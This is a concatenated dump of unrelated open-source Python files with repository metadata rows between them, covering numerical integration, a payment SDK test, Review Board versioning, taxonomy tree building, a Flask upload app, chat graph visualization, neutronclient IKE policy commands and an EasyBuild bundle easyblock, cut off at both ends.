x = A + h
while x < B:
int_sum1 += f(x)
x += 2 * h
x = A + 2 * h
while x < B:
int_sum2 += f(x)
x += 2 * h
return h / 3 * (f(A) + f(B) + 4 * int_sum1 + 2 * int_sum2)
def solve(method, h, k, eps):
while True:
h /= 2
sum_h, sum_h_half = method(h), method(h / 2)
rich = (2 ** k * sum_h_half - sum_h) / (2 ** k - 1)
if abs(sum_h - sum_h_half) <= eps:
break
print '{}:\t{}\t\t{}\t{}\t{}'.format(method.__name__, eps, h, sum_h, rich)
map(lambda x: map(solve, (x, x, x), (0.001, 0.001, 0.001), (2, 2, 4), eps), (rect, trap, simp))
| mit | 1,965,298,469,731,756,500 | 19.301887 | 95 | 0.412639 | false |
msherry/litle-sdk-for-python-114 | litleSdkPythonTest/functional/TestForceCapture.py | 1 | 2628 | #Copyright (c) 2011-2012 Litle & Co.
#
#Permission is hereby granted, free of charge, to any person
#obtaining a copy of this software and associated documentation
#files (the "Software"), to deal in the Software without
#restriction, including without limitation the rights to use,
#copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the
#Software is furnished to do so, subject to the following
#conditions:
#
#The above copyright notice and this permission notice shall be
#included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
#OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
#NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
#WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
#FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
#OTHER DEALINGS IN THE SOFTWARE.
import os, sys
lib_path = os.path.abspath('../all')
sys.path.append(lib_path)
from SetupTest import *
import unittest
class TestForceCapture(unittest.TestCase):
def testSimpleForceCaptureWithCard(self):
forcecapture = litleXmlFields.forceCapture()
forcecapture.amount = 106L
forcecapture.orderId = '12344'
forcecapture.orderSource = 'ecommerce'
card = litleXmlFields.cardType()
card.type = 'VI'
card.number = "4100000000000001"
card.expDate = "1210"
forcecapture.card = card
litleXml = litleOnlineRequest(config)
response = litleXml.sendRequest(forcecapture)
self.assertEquals("Approved",response.message)
def testSimpleForceCaptureWithToken(self):
forcecapture = litleXmlFields.forceCapture()
forcecapture.amount = 106L
forcecapture.orderId = '12344'
forcecapture.orderSource = 'ecommerce'
token = litleXmlFields.cardTokenType()
token.type = 'VI'
token.expDate = "1210"
token.litleToken = "123456789101112"
token.cardValidationNum = "555"
forcecapture.token = token
litleXml = litleOnlineRequest(config)
response = litleXml.sendRequest(forcecapture)
self.assertEquals("Approved",response.message)
def suite():
suite = unittest.TestSuite()
suite = unittest.TestLoader().loadTestsFromTestCase(TestForceCapture)
return suite
if __name__ =='__main__':
unittest.main() | mit | -7,517,700,063,915,625,000 | 35.013699 | 73 | 0.707002 | false |
chazy/reviewboard | reviewboard/__init__.py | 1 | 2020 | # The version of Review Board.
#
# This is in the format of:
#
# (Major, Minor, Micro, Patch, alpha/beta/rc/final, Release Number, Released)
#
VERSION = (1, 6, 0, 0, 'final', 0, True)
def get_version_string():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version += ".%s" % VERSION[2]
if VERSION[3]:
version += ".%s" % VERSION[3]
if VERSION[4] != 'final':
if VERSION[4] == 'rc':
version += ' RC%s' % VERSION[5]
else:
version += ' %s %s' % (VERSION[4], VERSION[5])
if not is_release():
version += " (dev)"
return version
def get_package_version():
version = '%s.%s' % (VERSION[0], VERSION[1])
if VERSION[2]:
version += ".%s" % VERSION[2]
if VERSION[3]:
version += ".%s" % VERSION[3]
if VERSION[4] != 'final':
version += '%s%s' % (VERSION[4], VERSION[5])
return version
def is_release():
return VERSION[6]
def initialize():
"""Begins initialization of Review Board.
This sets up the logging, generates cache serial numbers, and then
fires an initializing signal that other parts of the codebase can
connect to. This must be called for such features as e-mail notification
to work.
"""
import logging
import os
from django.conf import settings
from djblets.util.misc import generate_cache_serials
from djblets import log
from reviewboard import signals
# This overrides a default django templatetag (url), and we want to make
# sure it will always get loaded in every python instance.
import reviewboard.site.templatetags
# Set up logging.
log.init_logging()
if settings.DEBUG:
logging.debug("Log file for Review Board v%s (PID %s)" %
(get_version_string(), os.getpid()))
# Generate cache serials
generate_cache_serials()
signals.initializing.send(sender=None)
__version_info__ = VERSION[:-1]
__version__ = get_package_version()
| mit | 773,339,143,353,341,300 | 22.764706 | 79 | 0.60396 | false |
supertree-toolkit/stk | stk/scripts/tree_from_taxonomy.py | 1 | 5734 | # trees ready for supretree construction.
# Copyright (C) 2015, Jon Hill, Katie Davis
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Jon Hill. [email protected]
import argparse
import copy
import os
import sys
stk_path = os.path.join( os.path.realpath(os.path.dirname(__file__)), os.pardir )
sys.path.insert(0, stk_path)
import supertree_toolkit as stk
import csv
from ete2 import Tree
taxonomy_levels = ['species','subgenus','genus','subfamily','family','superfamily','subsection','section','infraorder','suborder','order','superorder','subclass','class','superclass','subphylum','phylum','superphylum','infrakingdom','subkingdom','kingdom']
tlevels = ['species','genus','subfamily','family','superfamily','infraorder','suborder','order','class','phylum','kingdom']
def main():
# do stuff
parser = argparse.ArgumentParser(
prog="create a tree from a taxonomy file",
description="Create a taxonomic tree",
)
parser.add_argument(
'-v',
'--verbose',
action='store_true',
help="Verbose output: mainly progress reports.",
default=False
)
parser.add_argument(
'top_level',
nargs=1,
help="The top level group to start with, e.g. family"
)
parser.add_argument(
'input_file',
metavar='input_file',
nargs=1,
help="Your taxonomy file"
)
parser.add_argument(
'output_file',
metavar='output_file',
nargs=1,
help="Your new tree file"
)
args = parser.parse_args()
verbose = args.verbose
input_file = args.input_file[0]
output_file = args.output_file[0]
top_level = args.top_level[0]
tree_taxonomy = stk.load_taxonomy(input_file)
new_taxa = tree_taxonomy.keys()
tl_types = []
for tt in tree_taxonomy:
tl_types.append(tree_taxonomy[tt][top_level])
tl_types = _uniquify(tl_types)
print tl_types
levels_to_worry_about = tlevels[0:tlevels.index(top_level)+1]
t = Tree()
nodes = {}
nodes[top_level] = []
for tl in tl_types:
n = t.add_child(name=tl)
nodes[top_level].append({tl:n})
for l in levels_to_worry_about[-2::-1]:
names = []
nodes[l] = []
ci = levels_to_worry_about.index(l)
for tt in tree_taxonomy:
try:
names.append(tree_taxonomy[tt][l])
except KeyError:
pass
names = _uniquify(names)
for n in names:
# find my parent
parent = None
for tt in tree_taxonomy:
try:
if tree_taxonomy[tt][l] == n:
try:
parent = tree_taxonomy[tt][levels_to_worry_about[ci+1]]
level = ci+1
except KeyError:
try:
parent = tree_taxonomy[tt][levels_to_worry_about[ci+2]]
level = ci+2
except KeyError:
try:
parent = tree_taxonomy[tt][levels_to_worry_about[ci+3]]
level = ci+3
except KeyError:
print "ERROR: tried to find some taxonomic info for "+tt+" from tree_taxonomy file/downloaded data and I went two levels up, but failed find any. Looked at:\n"
print "\t"+levels_to_worry_about[ci+1]
print "\t"+levels_to_worry_about[ci+2]
print "\t"+levels_to_worry_about[ci+3]
print "This is the taxonomy info I have for "+tt
print tree_taxonomy[tt]
sys.exit(1)
k = []
for nd in nodes[levels_to_worry_about[level]]:
k.extend(nd.keys())
i = 0
for kk in k:
if kk == parent:
break
i += 1
parent_id = i
break
except KeyError:
pass # no data at this level for this beastie
# find out where to attach it
node_id = nodes[levels_to_worry_about[level]][parent_id][parent]
nd = node_id.add_child(name=n.replace(" ","_"))
nodes[l].append({n:nd})
tree = t.write(format=9)
tree = stk._collapse_nodes(tree)
tree = stk._collapse_nodes(tree)
f = open(output_file, "w")
f.write(tree)
f.close()
def _uniquify(l):
"""
Make a list, l, contain only unique data
"""
keys = {}
for e in l:
keys[e] = 1
return keys.keys()
if __name__ == "__main__":
main()
| gpl-3.0 | 3,513,212,164,983,585,300 | 33.542169 | 256 | 0.509766 | false |
maddyloo/miniBibServer | webapp/flasktest1.py | 1 | 3138 | #!/usr/bin/python
## I got started with the tips and outline from:
## https://beagle.whoi.edu/redmine/projects/ibt/wiki/Deploying_Flask_Apps_with_Apache_and_Mod_WSGI
## Together with that starter kit, the contents of this file and the associated Apache config in
## ./celebratio are enough to get the site going.
import os
from flask import Flask, request, redirect, url_for, send_from_directory, current_app
from werkzeug.utils import secure_filename
## Awesome: this is what logs errors to the main apache error log!
## Uncomment for further debugging
# import logging, sys
# logging.basicConfig(stream=sys.stderr)
## And this turns on a nice debugger that, sadly, doesn't seem to work under WSGI/Apache
# from werkzeug.debug import DebuggedApplication
# application = DebuggedApplication(app, evalex=True)
import ims_legacy
UPLOAD_FOLDER = '/var/www/celebratio/apps/flasktest/ims_celebratio_uploads'
ALLOWED_EXTENSIONS = set(['tex', 'txt'])
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
# Only allow .tex and .txt files
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
# Main point of interaction
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
file = request.files['file']
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
# Save the uploaded file
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return redirect(url_for('uploaded_file', filename=filename))
return '''
<!doctype html>
<title>Upload biography in .tex format</title>
<h1>Upload biography data in .tex format</h1>
<form action="" method=post enctype=multipart/form-data>
<p><input type=file name=file>
<input type=submit value=Upload>
</form>
'''
# Display contents - however, instead of displaying the TeX, we really
# would prefer to display the HTML. There's a slight problem with the URL
# But if we can display the contents, that's at least something!
@app.route('/uploads/<filename>', methods=['GET', 'POST'])
def uploaded_file(filename):
basename = filename.rsplit('.', 1)[0]
htmlversion = filename.rsplit('.', 1)[0] + ".html"
outfile = open(app.config['UPLOAD_FOLDER'] + "/" + htmlversion,'w')
htmlcontent = "hello"
# print "upload folder: " + app.config['UPLOAD_FOLDER']
htmlcontent = ims_legacy.make_one(app.config['UPLOAD_FOLDER'] + "/" + filename)
outfile.write("<!doctype html><title>Data</title>Input: " + filename + "\nOutput: " + htmlversion + " <br><br> " + htmlcontent)
outfile.close()
# for demo purposes, let's just write the filename to an HTML file
# subsequently we will put content there
return send_from_directory(app.config['UPLOAD_FOLDER'], htmlversion)
if __name__ == '__main__':
"Are we in the __main__ scope? Start test server."
## Set debug=True to debug locally, set debug=False (etc.) for production
#app.run(debug=True)
app.run(host='0.0.0.0',port=5000,debug=False)
| mit | -4,089,402,284,788,163,600 | 38.225 | 131 | 0.683875 | false |
homeworkprod/chatrelater | src/chatrelater/visualization.py | 1 | 1866 | """
chatrelater.visualization
~~~~~~~~~~~~~~~~~~~~~~~~~
Visualize relations between chat partners using GraphViz_ (has to be
installed).
.. _GraphViz: http://www.graphviz.org/
:Copyright: 2007-2021 Jochen Kupperschmidt
:License: MIT, see LICENSE for details.
"""
import math
from typing import List, Tuple
from graphviz import Digraph, Graph
from graphviz.dot import Dot
from .nicknames import Nickname
DEFAULT_FORMAT = 'dot'
DEFAULT_PROGRAM = 'dot'
def generate_dot(
nicknames: List[Nickname],
relations: List[Tuple[Nickname, Nickname, int]],
*,
name: str,
format: str,
program: str,
directed: bool = False,
) -> Dot:
"""Create dot graph representations."""
dot = _create_graph(name, format, program, directed=directed)
_create_nodes(dot, nicknames)
_create_edges(dot, relations)
return dot
def _create_graph(
name: str, format: str, program: str, *, directed: bool
) -> Dot:
attrs = {
'name': name,
'format': format,
'engine': program,
}
if directed:
return Digraph(**attrs)
else:
return Graph(**attrs)
def _create_nodes(dot: Dot, nicknames: List[Nickname]) -> None:
for nickname in nicknames:
dot.node(nickname, label=nickname)
def _create_edges(
dot: Dot, relations: List[Tuple[Nickname, Nickname, int]]
) -> None:
max_count = float(max(rel[2] for rel in relations))
max_width = 4
for nickname1, nickname2, count in sorted(relations, key=lambda x: x[0]):
width = math.ceil(count / max_count * max_width)
dot.edge(nickname1, nickname2, style=f'setlinewidth({width:d})')
def write_file(dot: Dot) -> None:
"""Create a graphics file from the DOT data."""
rendered_filename = dot.render()
print(
f"Wrote {dot.format} output to '{rendered_filename}' using {dot.engine}."
)
| mit | 2,838,336,131,534,534,700 | 22.923077 | 81 | 0.642551 | false |
openstack/python-neutronclient | neutronclient/osc/v2/vpnaas/ikepolicy.py | 1 | 9098 | # Copyright 2017 FUJITSU LIMITED
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from osc_lib.utils import columns as column_util
from oslo_log import log as logging
from neutronclient._i18n import _
from neutronclient.common import utils as nc_utils
from neutronclient.osc import utils as osc_utils
from neutronclient.osc.v2.vpnaas import utils as vpn_utils
LOG = logging.getLogger(__name__)
_attr_map = (
('id', 'ID', column_util.LIST_BOTH),
('name', 'Name', column_util.LIST_BOTH),
('auth_algorithm', 'Authentication Algorithm', column_util.LIST_BOTH),
('encryption_algorithm', 'Encryption Algorithm', column_util.LIST_BOTH),
('ike_version', 'IKE Version', column_util.LIST_BOTH),
('pfs', 'Perfect Forward Secrecy (PFS)', column_util.LIST_BOTH),
('description', 'Description', column_util.LIST_LONG_ONLY),
('phase1_negotiation_mode', 'Phase1 Negotiation Mode',
column_util.LIST_LONG_ONLY),
('tenant_id', 'Project', column_util.LIST_LONG_ONLY),
('lifetime', 'Lifetime', column_util.LIST_LONG_ONLY),
)
def _convert_to_lowercase(string):
return string.lower()
def _get_common_parser(parser):
parser.add_argument(
'--description',
metavar='<description>',
help=_('Description of the IKE policy'))
parser.add_argument(
'--auth-algorithm',
choices=['sha1', 'sha256', 'sha384', 'sha512'],
type=_convert_to_lowercase,
help=_('Authentication algorithm'))
parser.add_argument(
'--encryption-algorithm',
choices=['aes-128', '3des', 'aes-192', 'aes-256'],
type=_convert_to_lowercase,
help=_('Encryption algorithm'))
parser.add_argument(
'--phase1-negotiation-mode',
choices=['main', 'aggressive'],
type=_convert_to_lowercase,
help=_('IKE Phase1 negotiation mode'))
parser.add_argument(
'--ike-version',
choices=['v1', 'v2'],
type=_convert_to_lowercase,
help=_('IKE version for the policy'))
parser.add_argument(
'--pfs',
choices=['group5', 'group2', 'group14'],
type=_convert_to_lowercase,
help=_('Perfect Forward Secrecy'))
parser.add_argument(
'--lifetime',
metavar="units=UNITS,value=VALUE",
type=nc_utils.str2dict_type(optional_keys=['units', 'value']),
help=vpn_utils.lifetime_help("IKE"))
return parser
def _get_common_attrs(client_manager, parsed_args, is_create=True):
attrs = {}
if is_create:
if 'project' in parsed_args and parsed_args.project is not None:
attrs['tenant_id'] = osc_utils.find_project(
client_manager.identity,
parsed_args.project,
parsed_args.project_domain,
).id
if parsed_args.description:
attrs['description'] = parsed_args.description
if parsed_args.auth_algorithm:
attrs['auth_algorithm'] = parsed_args.auth_algorithm
if parsed_args.encryption_algorithm:
attrs['encryption_algorithm'] = parsed_args.encryption_algorithm
if parsed_args.phase1_negotiation_mode:
attrs['phase1_negotiation_mode'] = parsed_args.phase1_negotiation_mode
if parsed_args.ike_version:
attrs['ike_version'] = parsed_args.ike_version
if parsed_args.pfs:
attrs['pfs'] = parsed_args.pfs
if parsed_args.lifetime:
vpn_utils.validate_lifetime_dict(parsed_args.lifetime)
attrs['lifetime'] = parsed_args.lifetime
return attrs
class CreateIKEPolicy(command.ShowOne):
_description = _("Create an IKE policy")
def get_parser(self, prog_name):
parser = super(CreateIKEPolicy, self).get_parser(prog_name)
_get_common_parser(parser)
parser.add_argument(
'name',
metavar='<name>',
help=_('Name of the IKE policy'))
osc_utils.add_project_owner_option_to_parser(parser)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
attrs = _get_common_attrs(self.app.client_manager, parsed_args)
if parsed_args.name:
attrs['name'] = str(parsed_args.name)
obj = client.create_ikepolicy({'ikepolicy': attrs})['ikepolicy']
columns, display_columns = column_util.get_columns(obj, _attr_map)
data = utils.get_dict_properties(obj, columns)
return display_columns, data
class DeleteIKEPolicy(command.Command):
_description = _("Delete IKE policy (policies)")
def get_parser(self, prog_name):
parser = super(DeleteIKEPolicy, self).get_parser(prog_name)
parser.add_argument(
'ikepolicy',
metavar='<ike-policy>',
nargs='+',
help=_('IKE policy to delete (name or ID)'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
result = 0
for ike in parsed_args.ikepolicy:
try:
ike_id = client.find_resource(
'ikepolicy', ike, cmd_resource='ikepolicy')['id']
client.delete_ikepolicy(ike_id)
except Exception as e:
result += 1
LOG.error(_("Failed to delete IKE policy with "
"name or ID '%(ikepolicy)s': %(e)s"),
{'ikepolicy': ike, 'e': e})
if result > 0:
total = len(parsed_args.ikepolicy)
msg = (_("%(result)s of %(total)s IKE policy failed "
"to delete.") % {'result': result, 'total': total})
raise exceptions.CommandError(msg)
class ListIKEPolicy(command.Lister):
_description = _("List IKE policies that belong to a given project")
def get_parser(self, prog_name):
parser = super(ListIKEPolicy, self).get_parser(prog_name)
parser.add_argument(
'--long',
action='store_true',
help=_("List additional fields in output")
)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
obj = client.list_ikepolicies()['ikepolicies']
headers, columns = column_util.get_column_definitions(
_attr_map, long_listing=parsed_args.long)
return (headers, (utils.get_dict_properties(s, columns) for s in obj))
class SetIKEPolicy(command.Command):
_description = _("Set IKE policy properties")
def get_parser(self, prog_name):
parser = super(SetIKEPolicy, self).get_parser(prog_name)
_get_common_parser(parser)
parser.add_argument(
'--name',
metavar='<name>',
help=_('Name of the IKE policy'))
parser.add_argument(
'ikepolicy',
metavar='<ike-policy>',
help=_('IKE policy to set (name or ID)'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
attrs = _get_common_attrs(self.app.client_manager,
parsed_args, is_create=False)
if parsed_args.name:
attrs['name'] = parsed_args.name
ike_id = client.find_resource(
'ikepolicy', parsed_args.ikepolicy,
cmd_resource='ikepolicy')['id']
try:
client.update_ikepolicy(ike_id, {'ikepolicy': attrs})
except Exception as e:
msg = (_("Failed to set IKE policy '%(ike)s': %(e)s")
% {'ike': parsed_args.ikepolicy, 'e': e})
raise exceptions.CommandError(msg)
class ShowIKEPolicy(command.ShowOne):
_description = _("Display IKE policy details")
def get_parser(self, prog_name):
parser = super(ShowIKEPolicy, self).get_parser(prog_name)
parser.add_argument(
'ikepolicy',
metavar='<ike-policy>',
help=_('IKE policy to display (name or ID)'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
ike_id = client.find_resource(
'ikepolicy', parsed_args.ikepolicy,
cmd_resource='ikepolicy')['id']
obj = client.show_ikepolicy(ike_id)['ikepolicy']
columns, display_columns = column_util.get_columns(obj, _attr_map)
data = utils.get_dict_properties(obj, columns)
return (display_columns, data)
| apache-2.0 | -2,731,209,515,089,461,000 | 36.286885 | 78 | 0.612003 | false |
hzlf/openbroadcast | website/apps/alibrary/middleware/object_linker.py | 1 | 4611 | import re
from django.conf import settings
from django.db.models.loading import get_model
from django.core.cache import cache
from django.utils.safestring import mark_safe
class ObjectLinkerMiddleware(object):
def process_response(self, request, response):
print response['Content-Type']
""""""
if response['Content-Type'].split(';', 1)[0] == 'text/html':
content = response.content
response.content = expand_tokens(content)
return response
def expand_tokens(str):
str = wikify_string(str)
return str
def wikisafe_markdown(value):
from django.contrib.markup.templatetags.markup import markdown
return mark_safe(markdown(value.replace('[[','LBRACK666').replace(']]','RBRACK666')).replace('LBRACK666','[[').replace('RBRACK666',']]'))
class WikiException(Exception): # Raised when a particular string is not found in any of the models.
pass
def wikify(match): # Excepts a regexp match
wikis = [] # Here we store our wiki model info
for i in settings.WIKISYNTAX:
name = i[0]
modstring = i[1]
module = __import__(".".join(modstring.split(".")[:-1]))
for count, string in enumerate(modstring.split('.')):
if count == 0:
continue
module = getattr(module,string)
module.name = name
wikis.append(module())
token, trail = match.groups() # we track the 'trail' because it may be a plural 's' or something useful
if ':' in token:
"""
First we're checking if the text is attempting to find a specific type of object.
Exmaples:
[[user:Subsume]]
[[card:Jack of Hearts]]
"""
prefix = token.split(':',1)[0].lower().rstrip()
name = token.split(':',1)[1].rstrip()
for wiki in wikis:
if prefix == wiki.name:
if wiki.attempt(name,explicit=True):
"""
We still check attempt() because maybe
work is done in attempt that render relies on,
or maybe this is a false positive.
"""
return wiki.render(name,trail=trail,explicit=True)
else:
raise WikiException
"""
Now we're going to try a generic match across all our wiki objects.
Example:
[[Christopher Walken]]
[[Studio 54]]
[[Beverly Hills: 90210]] <-- notice ':' was confused earlier as a wiki prefix name
[[Cat]]s <-- will try to match 'Cat' but will include the plural
[[Cats]] <-- will try to match 'Cats' then 'Cat'
"""
for wiki in wikis:
if getattr(wiki,'prefix_only',None):
continue
if wiki.attempt(token):
return wiki.render(token,trail=trail)
"""
We tried everything we could and didn't find anything.
"""
raise WikiException("No item found for '%s'"% (token))
class wikify_string(object):
def __call__(self, string, fail_silently=True):
self.fail_silently = fail_silently
self.cache = {}
self.set_cache = {}
#from wikisyntax import fix_unicode
WIKIBRACKETS = '\[\[([^\]]+?)\]\]'
if not string:
return ''
#string = fix_unicode.fix_unicode(string)
if getattr(settings,'WIKISYNTAX_DISABLE_CACHE',False) == False:
keys = re.findall(WIKIBRACKETS, string)
self.cache = cache.get_many([k.replace(' ','-').lower() for k in keys if len(k) < 251])
content = re.sub('%s(.*?)' % WIKIBRACKETS,self.markup_to_links,string)
cache.set_many(self.set_cache)
return content
def __new__(cls, string, **kwargs):
obj = super(wikify_string, cls).__new__(cls)
return obj(string, **kwargs)
def markup_to_links(self,match):
string = match.groups()[0].lower().replace(' ','-')
if getattr(settings,'WIKISYNTAX_DISABLE_CACHE',False) == False:
if string in self.cache:
return self.cache[string]
if string in self.set_cache:
return self.set_cache[string] # Maybe they typed it twice?
try:
new_val = wikify(match)
if getattr(settings,'WIKISYNTAX_DISABLE_CACHE',False) == False:
self.set_cache[string] = new_val
return new_val
except WikiException:
if not self.fail_silently:
raise
return string
| gpl-3.0 | 6,399,902,080,093,638,000 | 27.288344 | 141 | 0.563435 | false |
pescobar/easybuild-easyblocks | easybuild/easyblocks/generic/bundle.py | 1 | 11293 | ##
# Copyright 2009-2019 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for installing a bundle of modules, implemented as a generic easyblock
@author: Stijn De Weirdt (Ghent University)
@author: Dries Verdegem (Ghent University)
@author: Kenneth Hoste (Ghent University)
@author: Pieter De Baets (Ghent University)
@author: Jens Timmerman (Ghent University)
"""
import copy
import os
import easybuild.tools.environment as env
from easybuild.framework.easyblock import EasyBlock
from easybuild.framework.easyconfig import CUSTOM
from easybuild.framework.easyconfig.easyconfig import get_easyblock_class
from easybuild.tools.build_log import EasyBuildError, print_msg
from easybuild.tools.modules import get_software_root, get_software_version
class Bundle(EasyBlock):
"""
Bundle of modules: only generate module files, nothing to build/install
"""
@staticmethod
def extra_options(extra_vars=None):
"""Easyconfig parameters specific to bundles."""
if extra_vars is None:
extra_vars = {}
extra_vars.update({
'altroot': [None, "Software name of dependency to use to define $EBROOT for this bundle", CUSTOM],
'altversion': [None, "Software name of dependency to use to define $EBVERSION for this bundle", CUSTOM],
'default_component_specs': [{}, "Default specs to use for every component", CUSTOM],
'components': [(), "List of components to install: tuples w/ name, version and easyblock to use", CUSTOM],
'default_easyblock': [None, "Default easyblock to use for components", CUSTOM],
})
return EasyBlock.extra_options(extra_vars)
def __init__(self, *args, **kwargs):
"""Initialize easyblock."""
super(Bundle, self).__init__(*args, **kwargs)
self.altroot = None
self.altversion = None
# list of EasyConfig instances for components
self.comp_cfgs = []
# list of sources for bundle itself *must* be empty
if self.cfg['sources']:
raise EasyBuildError("List of sources for bundle itself must be empty, found %s", self.cfg['sources'])
# disable templating to avoid premature resolving of template values
self.cfg.enable_templating = False
# list of checksums for patches (must be included after checksums for sources)
checksums_patches = []
for comp in self.cfg['components']:
comp_name, comp_version, comp_specs = comp[0], comp[1], {}
if len(comp) == 3:
comp_specs = comp[2]
comp_cfg = self.cfg.copy()
easyblock = comp_specs.get('easyblock') or self.cfg['default_easyblock']
if easyblock is None:
raise EasyBuildError("No easyblock specified for component %s v%s", comp_cfg['name'],
comp_cfg['version'])
elif easyblock == 'Bundle':
raise EasyBuildError("The Bundle easyblock can not be used to install components in a bundle")
comp_cfg.easyblock = get_easyblock_class(easyblock, name=comp_cfg['name'])
# make sure that extra easyconfig parameters are known, so they can be set
extra_opts = comp_cfg.easyblock.extra_options()
comp_cfg.extend_params(copy.deepcopy(extra_opts))
comp_cfg['name'] = comp_name
comp_cfg['version'] = comp_version
comp_cfg.generate_template_values()
# do not inherit easyblock to use from parent (since that would result in an infinite loop in install_step)
comp_cfg['easyblock'] = None
# reset list of sources/source_urls/checksums
comp_cfg['sources'] = comp_cfg['source_urls'] = comp_cfg['checksums'] = []
for key in self.cfg['default_component_specs']:
comp_cfg[key] = self.cfg['default_component_specs'][key]
for key in comp_specs:
comp_cfg[key] = comp_specs[key]
# enable resolving of templates for component-specific EasyConfig instance
comp_cfg.enable_templating = True
# 'sources' is strictly required
if comp_cfg['sources']:
# If per-component source URLs are provided, attach them directly to the relevant sources
if comp_cfg['source_urls']:
for source in comp_cfg['sources']:
if isinstance(source, basestring):
self.cfg.update('sources', [{'filename': source, 'source_urls': comp_cfg['source_urls']}])
elif isinstance(source, dict):
# Update source_urls in the 'source' dict to use the one for the components
# (if it doesn't already exist)
if 'source_urls' not in source:
source['source_urls'] = comp_cfg['source_urls']
self.cfg.update('sources', [source])
else:
raise EasyBuildError("Source %s for component %s is neither a string nor a dict, cannot "
"process it.", source, comp_cfg['name'])
else:
# add component sources to list of sources
self.cfg.update('sources', comp_cfg['sources'])
else:
raise EasyBuildError("No sources specification for component %s v%s", comp_name, comp_version)
if comp_cfg['checksums']:
src_cnt = len(comp_cfg['sources'])
# add per-component checksums for sources to list of checksums
self.cfg.update('checksums', comp_cfg['checksums'][:src_cnt])
# add per-component checksums for patches to list of checksums for patches
checksums_patches.extend(comp_cfg['checksums'][src_cnt:])
self.comp_cfgs.append(comp_cfg)
self.cfg.update('checksums', checksums_patches)
self.cfg.enable_templating = True
def check_checksums(self):
"""
Check whether a SHA256 checksum is available for all sources & patches (incl. extensions).
:return: list of strings describing checksum issues (missing checksums, wrong checksum type, etc.)
"""
checksum_issues = []
for comp in self.comp_cfgs:
checksum_issues.extend(self.check_checksums_for(comp, sub="of component %s" % comp['name']))
return checksum_issues
def configure_step(self):
"""Collect altroot/altversion info."""
# pick up altroot/altversion, if they are defined
self.altroot = None
if self.cfg['altroot']:
self.altroot = get_software_root(self.cfg['altroot'])
self.altversion = None
if self.cfg['altversion']:
self.altversion = get_software_version(self.cfg['altversion'])
def build_step(self):
"""Do nothing."""
pass
def install_step(self):
"""Install components, if specified."""
comp_cnt = len(self.cfg['components'])
for idx, cfg in enumerate(self.comp_cfgs):
print_msg("installing bundle component %s v%s (%d/%d)..." % (cfg['name'], cfg['version'], idx+1, comp_cnt))
self.log.info("Installing component %s v%s using easyblock %s", cfg['name'], cfg['version'], cfg.easyblock)
comp = cfg.easyblock(cfg)
# correct build/install dirs
comp.builddir = self.builddir
comp.install_subdir, comp.installdir = self.install_subdir, self.installdir
# make sure we can build in parallel
comp.set_parallel()
# figure out correct start directory
comp.guess_start_dir()
# need to run fetch_patches to ensure per-component patches are applied
comp.fetch_patches()
# location of first unpacked source is used to determine where to apply patch(es)
comp.src = [{'finalpath': comp.cfg['start_dir']}]
# run relevant steps
for step_name in ['patch', 'configure', 'build', 'install']:
if step_name in cfg['skipsteps']:
comp.log.info("Skipping '%s' step for component %s v%s", step_name, cfg['name'], cfg['version'])
else:
comp.run_step(step_name, [lambda x: getattr(x, '%s_step' % step_name)])
# update environment to ensure stuff provided by former components can be picked up by latter components
# once the installation is finalised, this is handled by the generated module
reqs = comp.make_module_req_guess()
for envvar in reqs:
curr_val = os.getenv(envvar, '')
curr_paths = curr_val.split(os.pathsep)
for subdir in reqs[envvar]:
